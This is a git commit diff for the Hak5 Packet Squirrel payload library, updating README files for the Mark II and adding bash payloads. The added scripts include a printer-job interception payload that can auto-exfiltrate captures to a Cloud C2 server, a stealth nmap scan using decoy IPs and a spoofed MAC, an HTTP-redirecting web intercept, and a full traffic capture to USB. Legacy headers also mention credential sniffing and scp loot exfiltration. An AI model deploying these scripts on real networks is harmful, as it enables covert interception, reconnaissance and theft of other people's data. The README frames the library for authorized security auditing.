Update repos for Packet Squirrel Mk 2 release

README.md

@@ -1,39 +1,63 @@
 
 # Payload Library for the Packet Squirrel by Hak5
 
-This repository contains payloads and extensions for the Hak5 Packet Squirrel. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
+This repository contains payloads and extensions for the Hak5 Packet Squirrel, developed by the Hak5 Community. 
+
+Have a great payload?  Submit it by forking the payload repository and submitting a pull request!A
+
+Learn more about Github pull requests [here](https://docs.github.com/en/pull-requests/collaborating-with-pull-requests/proposing-changes-to-your-work-with-pull-requests/about-pull-requests) or from the Hak5 Bash Bunny tutorial [here](https://www.youtube.com/watch?v=H6z9BXevsZg).
+
+## Packet Squirrel Versions
+
+The Packet Squirrel Mark II expands on the capabilities of the original Packet Squirrel, introducing new commands and more flexible networking configurations.
+
+Payloads for the original Packet Squirrel can be found in the `legacy-mk1` directory.  These payloads may not work without modification on the Packet Squirrel Mark II.
 
 ## About the Packet Squirrel
 
-The Packet Squirrel by Hak5 is a stealthy pocket-sized man-in-the-middle.
+The Packet Squirrel Mark II by Hak5 is a stealthy pocket-sized man-in-the-middle.
 
 This Ethernet multi-tool is designed to give you covert remote access, painless packet captures, and secure VPN connections with the flip of a switch.
 
 -   [Purchase at Hak5](https://hak5.org/products/packet-squirrel "Purchase at Hak5")
--   [Documentation](https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel "Documentation")
+-   [Documentation](https://docs.hak5.org/packet-squirrel-mark-ii "Documentation")
 -   [Forums](https://forums.hak5.org/forum/94-packet-squirrel/ "Forums")
 -   [Discord](https://hak5.org/discord "Discord")
 
 ![Packet Squirrel](https://cdn.shopify.com/s/files/1/0068/2142/products/Packet_Squirrel_300x.jpg)
 
 ## Updating 
+
 If you've downloaded this repository via `git`, you can update to the latest versions of the payloads with `git pull`.  If you downloaded as a zip or other file, please download the latest from [github](https://github.com/hak5/packetsquirrel-payloads/).
 
 ## Disclaimer
-Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
+
+Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness or safety. As with any script, you are advised to proceed with caution.
 
 ## Legal
+
 Payloads from this repository are provided for educational purposes only.  Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
 
 ## Contributing
-Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
+
+Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publicly available.
 
 Please adhere to the following best practices and style guide when submitting a payload.
 
+Hak5 reserves the right to modify payloads to meet the guidelines when necessary, or to decline to include a payload in the public repository.
+
+Please ensure that any default configuration values do not point to actual services!  Do not include *your* passwords or login information in submitted payloads!
+
 ### Naming Conventions
-Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
+
+Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be placed into its own directory, with `-` or `_` used in place of spaces, in one of the categories such as exfiltration, phishing, remote_access or recon.  Please do not create your own category.
+
+The payload itself should be named `payload`.
+
+Additional files and documentation can be included in the payload directory.  Documentation should be in `README.md` or `README.txt`.
 
 ### Comments
+
 Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful.
 
     # Title: Meterpreter-via-SSH
@@ -53,6 +77,7 @@ Payloads should begin with comments specifying at the very least the name of the
 	# Cyan Blink 1 Time - Meterpreter Successful
 
 ### Configuration Options
+
 Configurable options should be specified in variables at the top of the payload.txt file
 
     # Options
@@ -61,9 +86,11 @@ Configurable options should be specified in variables at the top of the payload.
 	MSF_PORT=31337
 
 ### LED
+
 The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or `NETMODE`.
 
 	LED SETUP
 	NETMODE NAT
 
 Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.
+

legacy-mk1/README.md

@@ -0,0 +1,75 @@
+# Legacy payloads
+
+These payloads are for the original Packet Squirrel device.  
+
+They may or may not run without modification on the Packet Squirrel Mark II.
+
+
+## Payload Library for the Packet Squirrel by Hak5
+
+This repository contains payloads and extensions for the Hak5 Packet Squirrel. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
+
+## About the Packet Squirrel
+
+The Packet Squirrel by Hak5 is a stealthy pocket-sized man-in-the-middle.
+
+This Ethernet multi-tool is designed to give you covert remote access, painless packet captures, and secure VPN connections with the flip of a switch.
+
+-   [Purchase at Hak5](https://hak5.org/products/packet-squirrel "Purchase at Hak5")
+-   [Documentation](https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel "Documentation")
+-   [Forums](https://forums.hak5.org/forum/94-packet-squirrel/ "Forums")
+-   [Discord](https://hak5.org/discord "Discord")
+
+![Packet Squirrel](https://cdn.shopify.com/s/files/1/0068/2142/products/Packet_Squirrel_300x.jpg)
+
+## Updating 
+If you've downloaded this repository via `git`, you can update to the latest versions of the payloads with `git pull`.  If you downloaded as a zip or other file, please download the latest from [github](https://github.com/hak5/packetsquirrel-payloads/).
+
+## Disclaimer
+Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
+
+## Legal
+Payloads from this repository are provided for educational purposes only.  Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
+
+## Contributing
+Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
+
+Please adhere to the following best practices and style guide when submitting a payload.
+
+### Naming Conventions
+Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
+
+### Comments
+Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful.
+
+    # Title: Meterpreter-via-SSH
+	# Description: Covert meterpreter shell via overt SSH connection
+	# Author: Zappus
+	# Version: 1.0
+	# Category: Remote-Access
+	# Net Mode: NAT
+	# Firmware: 1.2
+	#
+	# LED State Descriptions
+	# Magenta Solid - Configuring NETMODE
+	# LED OFF - Waiting for BUTTON
+	# Red Blink 2 Times - SSH Connection Failed
+	# Amber Blink 5 Times - SSH Connection Successful
+	# Red Blink 1 Time - Meterpreter Failed
+	# Cyan Blink 1 Time - Meterpreter Successful
+
+### Configuration Options
+Configurable options should be specified in variables at the top of the payload.txt file
+
+    # Options
+    SSH_USER="username"
+	SSH_HOST="hostname"
+	MSF_PORT=31337
+
+### LED
+The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or `NETMODE`.
+
+	LED SETUP
+	NETMODE NAT
+
+Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.

legacy-mk1/payloads/library/exfiltration/Email-Sender/payload.sh

@@ -1,5 +1,8 @@
 #!/bin/bash
 
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+
 function run() {
    LED STAGE1
    SWITCH_POS=$(SWITCH)

legacy-mk1/payloads/library/exfiltration/FreeDaNutz/payload.sh

@@ -1,5 +1,8 @@
 #!/bin/bash
 #
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+#
 # Title:		FreeDaNutz
 
 # Description:		This payload will compress the loot folder and then send that file to a remote server via scp

legacy-mk1/payloads/library/general/I-Hate-Wifi/payload.sh

@@ -1,5 +1,8 @@
 #!/bin/bash
 
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+
 function scan() {
     LED G
     ifconfig wlan0 down

legacy-mk1/payloads/library/general/Wake-On-Lan/payload.sh

@@ -1,4 +1,8 @@
 #!/bin/bash 
+
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+
 LED STAGE1
 NETMODE NAT
 

legacy-mk1/payloads/library/general/caternet/payload.sh

@@ -1,4 +1,8 @@
 # Title: Caternet
+#
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+#
 # Author: Hak5Darren
 # Version: 1.0
 # Description: Forwards all traffic to local webserver hosting cat photos.

legacy-mk1/payloads/library/interception/dnsspoof/payload.sh

@@ -1,5 +1,8 @@
 #!/bin/bash
 #
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+# 
 # Title:		DNSSpoof
 # Description:	Forge replies to arbitrary DNS queries using DNSMasq
 # Author: 		Hak5

legacy-mk1/payloads/library/recon/ipinfo/payload.txt

@@ -1,5 +1,8 @@
 #!/bin/bash
 #
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+#
 # Title:        IP Info
 # Author:       Hak5Darren
 # Version:      1.0

legacy-mk1/payloads/library/recon/nmapdump/payload.sh

@@ -1,5 +1,8 @@
 #!/bin/bash
 # 
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+#
 # Title:		NMap Dump
 # Description:		Dumps NMap scan data to USB storage.
 # Author: 		infoskirmish.com

legacy-mk1/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh

@@ -1,4 +1,8 @@
 #!/bin/bash
+#
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+# 
 # Title:         Meterpreter-via-SSH
 # Description:   Covert meterpreter shell via overt SSH connection
 # Author:        Zappus

legacy-mk1/payloads/library/remote-access/SSH-remote-access/payload.sh

@@ -1,4 +1,8 @@
 #!/bin/bash
+#
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+# 
 # Title: SSH Remote Management Tool for Packet Squirrel
 # Description: Makes packet Squirrel directly accessible via SSH on a remote server
 # Author: BlackPropaganda

legacy-mk1/payloads/library/remote-access/Togglable-VPN/payload.sh

@@ -1,5 +1,8 @@
 #!/bin/bash
 # 
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+#
 # Title:		Togglable-VPN
 # Description:	Based on the default VPN payload; this can now create a VPN-connection to an OpenVPN-server, 
 #				or if the button is pressed, send traffic from the clients through said tunnel.

legacy-mk1/payloads/library/remote-access/openvpn/payload.sh

@@ -1,5 +1,8 @@
 #!/bin/bash
 # 
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+# 
 # Title:		OpenVPN
 # Description:	Create a connection to a VPN-connection to an OpenVPN-server. Optionally: Send traffic from the clients through said tunnel.
 # Author: 		Hak5

legacy-mk1/payloads/library/sniffing/ispyintel/payload.sh

@@ -1,5 +1,8 @@
 #!/bin/bash
 #
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+#
 # Title:		iSpy Passive Intel Gathering
 
 # Description:		Launches various tools to sniff out intel data.

legacy-mk1/payloads/library/sniffing/ngrep/payload.sh

@@ -1,4 +1,8 @@
 #!/bin/bash
+#
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+#
 # ngrep payload to snag creds
 
 NGREP_OPTIONS=("-wiql" "user|pass" "port" "21")

legacy-mk1/payloads/library/sniffing/tcpdump/payload.sh

@@ -1,5 +1,8 @@
 #!/bin/bash
 # 
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+#
 # Title:		TCPDump
 # Description:	Dumps networking-data to USB storage. Completes on button-press or storage full.
 # Author: 		Hak5

payloads/exfiltration/pcl_printer/payload

@@ -0,0 +1,53 @@
+#!/bin/bash
+
+# Title:        PCL Printer Capture
+# Description:  Capture PCL IP printer jobs with a dynamic proxy 
+# Author:       Hak5
+
+# To convert PCL files to PDF, use a tool like GhostPCL:
+# https://ghostscript.com/releases/gpcldnld.html 
+#
+# To convert a stream (captured-file.stream) to PDF (printed.pdf), use something 
+# like:
+# ./gpcl6-1000-linux-x86_64 -o printed.pdf -sDEVICE=pdfwrite captured-file.stream 
+
+# Do we automatically exfiltrate to Cloud C2?  Uncomment to send files to your 
+# CloudC2 server automatically
+# 
+# USE_C2=1
+
+# By default, C2WATCHDIR removes files after they're sent.  To keep them, uncomment 
+# C2_KEEP_FILES below
+# 
+# C2_KEEP_FILES=1
+
+LED SETUP
+
+NETMODE NAT
+
+# We have to have attached USB
+USB_WAIT
+
+# Make sure the directory exists
+mkdir /usb/printer/
+
+# If USE_C2 isn't empty, we're uploading to CloudC2
+if [[ ! -z "$USE_C2" ]]; then
+	# If C2_KEEP_FILES is not empty, we want to preserve the
+    # files on USB, otherwise run C2WATCHDIR normally and delete
+    # the files after they are sent.
+	if [[ ! -z "$C2_KEEP_FILES" ]]; then
+    	C2_KEEP_FILES=1 C2WATCHDIR /usb/printer/ &
+    else
+        C2WATCHDIR /usb/printer/ &
+    fi
+    
+	# Give C2WATCHDIR a moment to sync any old files that were present
+	sleep 3
+fi
+
+LED ATTACK
+
+# Use a dynamic proxy to MITM standard PCL IP printers
+DYNAMICPROXY CLIENT /usb/printer/print_ 9100 
+

payloads/general/gatekeeper/payload

@@ -0,0 +1,32 @@
+#!/bin/bash
+
+# Title:        Gatekeeper
+#
+# Description:  Toggle access to the network with the pushbutton 
+# Author:       Hak5
+
+# Set the default network mode (such as NAT or BRIDGE)
+NETWORK_MODE="BRIDGE"
+
+NETMODE ${NETWORK_MODE}
+
+LED G SOLID
+
+while true; do 
+    # Run the buttom command with no LED; this way the LED stays
+    # solid green
+    NO_LED=1 BUTTON
+
+    # Check the existing network mode; if we're not the right mode,
+    # send the target device to jail
+    if [ $(cat /tmp/squirrel_netmode) == "${NETWORK_MODE}" ]; then
+        LED R FAST
+        NETMODE JAIL
+        LED R SOLID
+    else
+        # Set the network mode back to our normal mode
+        LED G FAST
+        NETMODE ${NETWORK_MODE}
+        LED G SOLID
+    fi
+done

payloads/interception/dns_sinkhole/payload

@@ -0,0 +1,14 @@
+#!/bin/bash
+
+# Title:        DNS Sinkhole
+# Description:  Demonstrate sinkholing a DNS domain (hak5.org) 
+# Author:       Hak5
+
+# This payload will intercept any requests for a *.hak5.org domain 
+# and redirect them to localhost (127.0.0.1 for IPv4 or ::1 for IPv6)
+
+NETMODE BRIDGE 
+
+LED R SINGLE
+
+SPOOFDNS br-lan '.*.hak5.org=127.0.0.1' 'hak5.org=127.0.0.1' '.*.hak5.org=::1' 'hak5.org=::1' 

payloads/interception/web_intercept/payload

@@ -0,0 +1,30 @@
+#!/bin/bash
+
+# Title:        Minimalistic web intercept
+# Description:  Replace HTTP with Squirrels.
+# Author:       Hak5
+# 
+# squirrel.jpg from Wikipedia
+# https://upload.wikimedia.org/wikipedia/commons/6/68/Sciuridae.jpg
+# By Chicoutimi (montage)KarakalAndiWNational Park Serviceen
+# User:Markus KrötzschThe Lilac Breasted RollerNico Conradie from Centurion, 
+# South AfricaHans HillewaertSylvouilleNational Park Service - Own work, CC BY 3.0, 
+# https://commons.wikimedia.org/w/index.php?curid=10213698
+
+NETMODE NAT
+LED B SOLID
+
+# Add a web payload to the nftables
+nft add table ip webpayload
+
+# Hook prerouting
+nft -- add chain ip webpayload prerouting { type nat hook prerouting priority -100 \; }
+
+# Redirect port 80 to our local 8080
+nft add rule ip webpayload prerouting tcp dport 80 redirect to :8080
+
+while true;
+  do echo -e "HTTP/1.1 200 OK\nContent-Type: image/jpeg\n" | \
+    cat - /root/payloads/$(SWITCH)/squirrel.jpg | \
+    netcat -l -p 8080; 
+done

payloads/recon/nmapdump/README.md

@@ -0,0 +1,30 @@
+Title:	     	NMap Dump
+
+Description:	Dumps NMap scan data to USB storage.
+
+Author: 		infoskirmish.com
+
+Version:		2.0
+
+Category:		sniffing
+
+Target: 		Any
+
+Net Mode:		NAT
+
+
+LEDs
+
+SUCCESS:		Scan complete
+
+FAIL:			No USB storage found
+
+SCANNING:		Rapid White
+
+This payload will launch NMap on a given interface (default eth0) and scan the local subnet. There is no need to know the subnet as the payload will capture and infer the subnet from the IP it receives while launching. 
+
+The payload will store scan files in all three file types supported by nmap. Also the payload will create a log.txt file to dump process information which may be useful to troubleshoot errors. The default path is /mnt/loot/nmapdump
+
+The payload has common variables that maybe changed located at the top of the file making customizing this payload as your deployment needs dictate. 
+
+Updated for the Packet Squirrel Mark II by Hak5

payloads/recon/nmapdump/payload.sh

@@ -0,0 +1,276 @@
+#!/bin/bash
+# 
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+#
+# Title:		NMap Dump
+# Description:		Dumps NMap scan data to USB storage.
+# Author: 		infoskirmish.com
+# Version:		2.0
+# Category:		sniffing
+# Target: 		Any
+# Net Mode:		TRANSPARENT
+
+# Updated to the Packet Squirrel Mark II by Hak5
+
+# LEDs
+# SUCCESS:		Scan complete
+# FAIL:			No USB storage found
+# SCANNING:		Rapid White
+
+#### Constants ####
+
+# If you know which interface will allow outbound traffic you can specify it here
+# leaving it blank will enable the payload trying to attempt to figure out which
+# interface to use.
+defaultInterface="lo"
+
+
+# Number of decoy IPs to spawn
+rndDecoyNumber=5
+
+# Spoof the MAC of this device type
+spoofDevType="Cisco"
+
+# Seconds to sleep while loading NAT
+netSleep=10
+
+# Squirrel NETMODE TRANSPARENT | BRDIGE | NAT | NONE
+# BRIDGE mode will preserve the Squirrel IP 
+mode="BRIDGE"
+
+# When done what should we do? reboot | halt | nothing | poweroff
+onEnd="halt"
+
+# Path to store results
+lootPath="/usb/loot/nmapdump"
+
+# File name scheme 
+lootFileNameScheme="nmapdump_$(date +%Y-%m-%d-%H%M)"
+
+# Clear the log every run?
+clearLogs=true
+
+#### Payload Code ####
+
+function finish() {
+
+	# Sync filesystem
+	sync
+
+	# Indicate successful shutdown
+	LED B SUCCESS
+	sleep 1
+
+	# Halt the system
+	LED OFF
+
+	case "$onEnd" in
+		"poweroff") poweroff ;;
+		"reboot") reboot ;;
+		"halt") halt ;;
+		"nothing") echo "see ya!" >> $lootPath/log.txt ;;
+		*) reboot;;
+	esac
+
+}
+
+function run() {
+
+	# Create loot directory
+	mkdir -p $lootPath &> /dev/null
+
+    # Clear the logs
+    if [ "${clearLogs}x" == "truex" ]; then
+        echo > ${lootPath}/log.txt
+    fi
+	
+	# Set networking mode to user preferance and sleep to allow time to sync up.
+	# If set to NONE this will not be set and thus not kick you out of your SSH session.
+	if [ "$mode" != "NONE" ]; then
+	
+		NETMODE $mode
+		sleep $netSleep
+
+	fi 
+
+	# Log ifconfig data; helpful for troubleshooting 
+	ifconfig >> $lootPath/log.txt
+
+	# Starting scanning LED (rapid white blink)
+  	LED W VERYFAST
+
+	# Run nmap scan with options
+
+	# Now lets figure out which interface to use.
+	iface=$(ip -o link show | awk '{print $2}')
+
+	# Set ipv6 default to null
+	ipv6=""
+
+	# Now lets look at the ip addresses assigned to the various interfaces.
+	while IFS= read -r line; do
+
+		# Standardize interface name
+        	line="${line//:}"
+
+		# We can skip lo
+        	if [ "$line" != "lo" ]; then
+
+			# Get IP Address for Interface.
+			ifip=$(ifconfig $line 2>/dev/null|awk '/inet addr:/ {print $2}'|sed 's/addr://')
+
+			# Make sure result is not null.
+			if [ "$ifip" ]; then
+
+				# Store for later use the ip addresses associted with interface.
+				# We don't want an empty 1st line.
+				if [ "$ipaddresses" ]; then
+					ipaddresses+=$'\n'$ifip
+				else
+					ipaddresses=$ifip
+				fi
+			
+				# If user has specified a default interface than we can disregard.
+				if [ ! "$defaultInterface" ]; then
+
+					# Store the interface for later use.	
+					# We don't want an empty 1st line.
+					if [ "$interfaces" ]; then
+						interfaces+=$'\n'$line
+					else
+						interfaces=$line
+					fi
+				fi
+			
+				# convert ip to subnet
+				newSubNet=`echo $ifip | cut -d"." -f1-3`
+				newSubNet=$newSubNet".1/24"
+		
+				# Add subnet to list
+				# We don't want a leading empty character.
+				if [ "$newSubNet" ]; then
+					targets+=" $newSubNet"
+				else
+					targets=$newSubNet
+				fi
+
+			fi	
+
+	        fi # end our test for lo
+
+	done <<< "$iface"  # loop to gather IP addresses
+
+	# Clean up subnets to remove accidental double spaces.
+	echo "$targets" | awk '$1=$1' &> /dev/null
+
+	# if targets is empty we have no subnets. Let's check if we can find IPv6 
+	if [ ! "$targets" ]; then
+
+		# Collect all uniqu IPv6 address that we can ping.
+		ipv6=$(ping -6 ff02::1 -w 10 2>/dev/null | awk '/from/ {print $4}' | cut -d":" -f1-6 | sort | uniq | tr "\r\n" " ")
+		if [ ! "$ipv6" ]; then
+
+			# We could not find any ipv4 address and ipv6 returned nothing.
+			echo "Could not accquire any IP addresses to scan." >> $lootPath/log.txt
+			sync
+			LED OFF
+			exit 1
+		fi
+	fi
+
+	# Add lo as some setups the loopback maybe the interface to send out traffic
+	# If user supplies default interface tie in their selection and disregard the
+	# auto locate data.
+	if [ ! "$defaultInterface" ]; then
+		interfaces+=$'\nlo'
+	else
+		interfaces=$defaultInterface
+	fi
+
+	# log subnets and ip addresses we found
+	echo "Subnets to scan $targets" >> $lootPath/log.txt
+	echo "IPs to scan $ipaddresses" >> $lootPath/log.txt
+
+	# Document the fact we will be scanning ipv6
+	if [ "$ipv6" ]; then
+		echo "We will be scanning ipv6 addresses" >> $lootPath/log.txt
+	fi
+
+	# Now lets find the interface that will allow outbound traffic on the LAN.
+	while IFS= read -r interface; do
+
+		# We will use the ip addresses we found to see if this interface can ping it.
+		while IFS= read -r ip; do
+
+			# If we can send ping packets then the interface is likley able to work with nmap
+			# Determin if we should ping in ipv4 or ipv6
+			if [ ! "$ipv6" ]; then
+
+				if [[ ! $(ping -I $interface $ip -w 3 | grep '0 packets received') ]]; then
+			
+					# Make sure wee don't end up with a blank first line.
+					if [ "$goodInterface" ]; then
+
+						goodInterfaces+=$'\n'$interface
+					else
+						goodInterfaces=$interface
+					fi			
+				fi
+
+			else
+
+				if [[ ! $(ping -6 ff02::1 -w 3 | grep '0 packets received') ]]; then
+			
+					# Make sure wee don't end up with a blank first line.
+					if [ "$goodInterface" ]; then
+
+						goodInterfaces+=$'\n'$interface
+					else
+						goodInterfaces=$interface
+					fi			
+				fi
+
+			fi
+
+		done <<< "$ipaddresses" # end loop to find interfaces we can use
+
+	done <<< "$interfaces" # end loop to scan interfaces
+
+	# Log interfaces we can use
+	echo "Interfaces allowing outbound traffic: $goodInterfaces" >> $lootPath/log.txt
+
+	# Make sure we have interfaces that will allow outbound traffic.	
+	if [ "$goodInterfaces" ]; then	
+		while IFS= read -r goodInterface; do
+
+			# Finally! Lets run NMap!
+			# Use ipv4
+			if [ ! "$ipv6" ]; then
+				nmap -Pn -e $goodInterface -sS -F -sV -oA $lootPath/$lootFileNameScheme -D RND:$rndDecoyNumber --randomize-hosts --spoof-mac $spoofDevType $targets >> $lootPath/log.txt
+			else
+				# Use ipv6
+				nmap -Pn -e $goodInterface -sT -F -R -oA $lootPath/$lootFileNameScheme --randomize-hosts --spoof-mac $spoofDevType -6 $ipv6 >> $lootPath/log.txt
+			fi
+	
+		done <<< "$goodInterfaces"
+
+	else
+		echo "Could not find any interfaces that will allow outbound traffic." >> $lootPath/log.txt
+		exit 1
+	fi
+
+
+	# Done scanning; clean up.
+	finish
+
+} # end run() function
+
+USB_WAIT
+
+# Show attack LED
+LED ATTACK
+
+# ATTACK!!!!
+run
+

payloads/remote-access/wake_on_lan/README.md

@@ -0,0 +1,7 @@
+# Wake-on-LAN
+
+This payload generates a WoL (Wake-on-LAN) magic packet for the devices listed in the 
+payload configuration.
+
+Make sure to copy BOTH `payload` and `wol_python.py` to the SAME payload directory on
+the Packet Squirrel!

payloads/remote-access/wake_on_lan/payload

@@ -0,0 +1,37 @@
+#!/bin/bash
+
+# Title:        Wake on Lan
+# Description:  Wake On Lan with Python
+# Author:       Hak5
+
+# Configuration
+
+# MAC addresses, separated by spaces
+WOL_TARGETS="11:22:33:44:55:66 AA:BB:CC:DD:EE:FF"
+
+# How often do we wake up systems, in seconds?
+WOL_INTERVAL=30
+
+
+
+
+# NAT mode
+NETMODE NAT
+
+# Set the LED
+LED G SINGLE
+
+while true; do
+    # Toggle the LED, send the WoL
+    LED W SOLID
+    python /root/payloads/$(SWITCH)/python_wol.py ${WOL_TARGETS}
+    
+    # Wait one second for the LED to be visible
+    sleep 1
+    
+    # Reset the LED
+    LED G SINGLE
+    
+    # Wait the wakeup interval
+    sleep ${WOL_INTERVAL}
+done

payloads/remote-access/wake_on_lan/python_wol.py

@@ -0,0 +1,21 @@
+#!/usr/bin/python
+
+import sys
+import socket
+
+# Simplified function to send a wake-on-lan packet
+def send_wol(destination):
+    sync = "FF" * 6
+    macs = destination * 16
+    payload = bytes.fromhex(sync + macs)
+    
+    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+    sock.sendto(payload, ("255.255.255.255", 9))
+
+# Send a WoL packet for each MAC address we
+# were called with
+for mac in sys.argv[1:]:
+    fin_mac = mac.replace(":", "")
+    send_wol(fin_mac)
+

payloads/sniffing/tcpdump/payload

@@ -0,0 +1,72 @@
+#!/bin/bash
+# 
+# Title:		TCPDump
+# Description:	Dumps networking-data to USB storage. Completes on button-press or storage full.
+# Author: 		Hak5
+# Version:		1.0
+# Category:		sniffing
+# Target: 		Any
+# Net Mode:		TRANSPARENT
+
+# LEDs
+# SUCCESS:		Dump complete
+# FAIL:			No USB storage found
+
+function monitor_space() {
+	while true
+	do
+		[[ $(USB_FREE) -lt 10000 ]] && {
+			kill $1
+			LED G SUCCESS
+			sync
+			break
+		}
+		sleep 5
+	done
+}
+
+function finish() {
+	# Kill TCPDump and sync filesystem
+	kill $1
+	wait $1
+	sync
+
+	# Indicate successful shutdown
+	LED R SUCCESS
+	sleep 1
+
+	# Halt the system
+	LED OFF
+	halt
+}
+
+function run() {
+	# Create loot directory
+    mkdir -p /usb/loot/tcpdump &> /dev/null
+	
+	# Set networking to TRANSPARENT mode and wait five seconds
+	NETMODE TRANSPARENT
+	sleep 5
+
+    LED ATTACK
+	
+	# Start tcpdump on the bridge interface
+	tcpdump -i br-lan -s 0 -w /usb/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null &
+	tpid=$!
+
+	# Wait for button to be pressed (disable button LED)
+	NO_LED=true BUTTON
+	finish $tpid
+}
+
+
+# This payload will only run if we have USB storage
+
+# Wait for the USB drive
+USB_WAIT
+
+LED ATTACK
+run &
+monitor_space $! &
+
+wait